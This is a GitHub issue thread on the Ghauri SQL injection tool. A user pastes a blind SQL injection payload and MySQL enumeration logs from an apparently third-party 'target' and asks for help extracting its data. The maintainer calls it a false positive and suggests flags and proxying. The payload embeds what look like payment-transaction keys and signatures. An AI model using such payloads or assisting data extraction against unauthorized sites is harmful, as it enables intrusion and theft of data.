### ISSUE TITLE
help

### ISSUE THREAD

**Issue by Al-Haqbani** [r0oth3x49/ghauri#89]
Hello, I was checking a target and found that it is not possible to extract the data. I hope that I can get your help

Ghauri resumed the following injection point(s) from stored session:
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=YToxODp7czo3OiJmYWN0aW9uIjtzOjUxOiJodHRwczovL3d3dy5leGNpdGl4LmNvbS5teS93ZWIvcmF6ZXJfcGF5bWVudF9yZXR1cm4iO3M6NzoiZm1ldGhvZCI7czo0OiJwb3N0IjtzOjU6ImZzaWduIjtzOjQwOiJiN2RiMmY2MzBkNzgyMDJiOThhNDlmMDBhMjc3MDFhMTIwZTYzOGI4IjtzOjQ6InNrZXkiO3M6MzI6IjRhNzBhZWQ2MmYxM2NjZWYxNzQxYzliMzg4ZDNiNzE1IjtzOjY6InRyYW5JRCI7czoxMDoiMTU5MTY5NzQ0MSI7czo2OiJkb21haW4iO3M6MTU6Im1hY3BpZXByb3RpY2tldCI7czo2OiJzdGF0dXMiO3M6MjoiMDAiO3M6NjoiYW1vdW50IjtzOjU6IjUwLjAwIjtzOjg6ImN1cnJlbmN5IjtzOjM6Ik1ZUiI7czo3OiJwYXlkYXRlIjtzOjE5OiIyMDIzLTA3LTAxIDExOjMyOjI4IjtzOjc6Im9yZGVyaWQiO3M6MTQ6IiM2MjQ4MjQ2ODQ0NTIwIjtzOjc6ImFwcGNvZGUiO3M6MDoiIjtzOjEwOiJlcnJvcl9jb2RlIjtOO3M6MTA6ImVycm9yX2Rlc2MiO3M6MDoiIjtzOjc6ImNoYW5uZWwiO3M6NzoiR3JhYlBheSI7czo4OiJvQ2hhbm5lbCI7czo3OiJHcmFiUGF5IjtzOjk6ImxfdmVyc2lvbiI7aToxO3M6NjoiZXh0cmFQIjtzOjMyOiJ7ImdyYWJwYXlfaW5kaWNhdG9yIjoiR1BXQUxMRVQifSI7fQ== AND 05049=5049
---
[16:44:22] [INFO] testing MySQL
[16:44:23] [INFO] confirming MySQL
[16:44:24] [INFO] the back-end DBMS is MySQL
[16:44:24] [INFO] fetching database names
[16:44:24] [INFO] fetching number of databases
[16:44:28] [WARNING] it was not possible to extract query output length for the SQL query provided.
[16:44:28] [WARNING] the SQL query provided does not return any output
[16:44:28] [ERROR] unable to retrieve the number of databases
[16:44:28] [INFO] fetching current database
[16:44:29] [INFO] resumed: '+m'
current database: '+m'

**Comment by r0oth3x49** [comment]
this is a false positive case, try --confirm and --text-only with -v 3 or --proxy to proxy traffic through burp.

**Comment by skalvin** [comment]
how to run ghauri with socks5 or proxylist
